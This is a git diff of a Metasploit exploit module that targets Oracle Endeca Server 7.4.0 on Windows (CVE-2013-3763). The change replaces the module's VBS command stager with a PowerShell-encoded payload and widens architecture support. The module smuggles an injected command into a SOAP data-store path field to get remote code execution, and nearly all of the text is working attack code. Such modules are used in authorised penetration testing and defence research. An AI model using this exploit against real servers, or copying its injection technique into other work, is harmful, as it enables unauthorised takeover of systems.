diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index 19ba6c2a83..e30b0b61bf 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStagerVBS + include Msf::Exploit::Powershell def initialize super( @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez' # Metasploit module ], 'Platform' => 'win', - 'Arch' => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS + 'Arch' => [ ARCH_X86_64, ARCH_X86 ], 'References' => [ [ 'CVE', '2013-3763' ], @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Targets' => [ - [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ] + [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ] ], 'DefaultTarget' => 0, 'Privileged' => false, @@ -131,21 +131,24 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...") - # Windows 2008 Command Prompt Max Length is 8191 - execute_cmdstager({ :delay => 0.35, :linemax => 7500 }) + command = cmd_psh_payload(payload.encoded) + if command.length > 8000 + # Windows 2008 Command Prompt Max Length is 8191 + fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command") + end + print_status("#{peer} - Exploiting through Powershell...") + execute_command(command) end - def execute_command(cmd, opts) - # To delete spaces priors to crlf lines since it is an observed behavior on Win 2008 - cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")") + def execute_command(cmd) # HTML encode ampersands so SOAP is correctly interpreted cmd.gsub!(/&/, "&") injection = "c:\\"& #{cmd} &"" exploit_data = create_data_store_soap(rand_text_alpha(4), injection) begin res = send_request_soap(exploit_data) - if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/ + if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ ) + print_status("#{res.code}\n#{res.body}") if res fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager") end rescue ::Rex::ConnectionError